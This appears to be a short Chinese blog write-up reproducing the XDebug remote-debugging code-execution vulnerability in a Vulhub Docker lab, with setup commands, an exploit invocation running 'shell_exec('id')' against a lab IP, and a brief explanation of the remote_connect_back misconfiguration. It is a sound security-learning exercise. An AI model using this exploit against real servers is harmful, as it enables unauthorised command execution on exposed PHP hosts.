XDebug 远程调试漏洞复现(代码执行)
XDebug 远程调试漏洞复现(代码执行)前言环境搭建前言因为自己在调试php的时候就是使用的xdebug,不过没有开启xdebug.remote_connect_back = 1,这个是给远程调试使用,可以使用任意主机进行调试,如果不配置的话仅通过指定ip才可以调试,比较安全环境搭建启动dockersystemctl start docker获取vulhubgit clone --depth=1
·
前言
因为自己在调试php的时候就是使用的xdebug,不过没有开启xdebug.remote_connect_back = 1
,这个是给远程调试使用,可以使用任意主机进行调试,如果不配置的话仅通过指定ip才可以调试,比较安全
环境搭建
启动docker
systemctl start docker
获取vulhub
git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
进入对应目录
cd vulhub/php/xdebug-rce/
启动容器
docker-compose up -d
查看容器
docker ps
在kali执行exp
exp的位置在vulhub/php/xdebug-rce/
目录下
python3 exp.py -t http://192.168.164.162:8080/index.php -c 'shell_exec('id');'
因为xdebug本身就是一个调试程序,对get参数或者cookie的执行参数进行验证,如果验证通过就会进行调试,这里因为没有指定远端主机,所以任意主机都可以对php进行调试,即执行命令。
以上为个人理解,如果有错误欢迎大家指出。
更多推荐
已为社区贡献5条内容
所有评论(0)